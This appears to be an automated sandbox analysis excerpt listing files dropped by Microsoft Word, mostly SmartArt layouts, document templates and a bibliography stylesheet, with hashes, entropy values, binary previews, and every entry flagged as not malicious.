                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):258
                            Entropy (8bit):3.4692172273306268
                            Encrypted:false
                            SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                            MD5:C1B36A0547FB75445957A619201143AC
                            SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                            SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                            SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):7370
                            Entropy (8bit):7.9204386289679745
                            Encrypted:false
                            SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                            MD5:586CEBC1FAC6962F9E36388E5549FFE9
                            SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                            SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                            SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                            Malicious:false
                            Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):262
                            Entropy (8bit):3.4901887319218092
                            Encrypted:false
                            SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                            MD5:52BD0762F3DC77334807DDFC60D5F304
                            SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                            SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                            SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):5596
                            Entropy (8bit):7.875182123405584
                            Encrypted:false
                            SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                            MD5:CDC1493350011DB9892100E94D5592FE
                            SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                            SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                            SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                            Malicious:false
                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):256
                            Entropy (8bit):3.4842773155694724
                            Encrypted:false
                            SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                            MD5:923D406B2170497AD4832F0AD3403168
                            SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                            SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                            SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):11380
                            Entropy (8bit):7.891971054886943
                            Encrypted:false
                            SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                            MD5:C9F9364C659E2F0C626AC0D0BB519062
                            SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                            SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                            SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                            Malicious:false
                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):274
                            Entropy (8bit):3.438490642908344
                            Encrypted:false
                            SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                            MD5:0F98498818DC28E82597356E2650773C
                            SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                            SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                            SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):34415
                            Entropy (8bit):7.352974342178997
                            Encrypted:false
                            SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                            MD5:7CDFFC23FB85AD5737452762FA36AAA0
                            SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                            SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                            SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                            Malicious:false
                            Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):246
                            Entropy (8bit):3.5039994158393686
                            Encrypted:false
                            SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                            MD5:16711B951E1130126E240A6E4CC2E382
                            SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                            SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                            SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):3683
                            Entropy (8bit):7.772039166640107
                            Encrypted:false
                            SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                            MD5:E8308DA3D46D0BC30857243E1B7D330D
                            SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                            SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                            SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                            Malicious:false
                            Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):280
                            Entropy (8bit):3.484503080761839
                            Encrypted:false
                            SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                            MD5:1309D172F10DD53911779C89A06BBF65
                            SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                            SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                            SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):9191
                            Entropy (8bit):7.93263830735235
                            Encrypted:false
                            SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                            MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                            SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                            SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                            SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                            Malicious:false
                            Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):286
                            Entropy (8bit):3.538396048757031
                            Encrypted:false
                            SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                            MD5:149948E41627BE5DC454558E12AF2DA4
                            SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                            SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                            SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):250983
                            Entropy (8bit):5.057714239438731
                            Encrypted:false
                            SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                            MD5:F883B260A8D67082EA895C14BF56DD56
                            SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                            SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                            SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):16806
                            Entropy (8bit):7.9519793977093505
                            Encrypted:false
                            SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                            MD5:950F3AB11CB67CC651082FEBE523AF63
                            SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                            SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                            SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                            Malicious:false
                            Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):254
                            Entropy (8bit):3.4720677950594836
                            Encrypted:false
                            SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                            MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                            SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                            SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                            SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):374
                            Entropy (8bit):3.5414485333689694
                            Encrypted:false
                            SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                            MD5:2F7A8FE4E5046175500AFFA228F99576
                            SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                            SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                            SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):47296
                            Entropy (8bit):6.42327948041841
                            Encrypted:false
                            SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                            MD5:5A53F55DD7DA8F10A8C0E711F548B335
                            SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                            SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                            SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                            Malicious:false
                            Preview:PK........<dSA4...T...P.......[Content_Types].xml 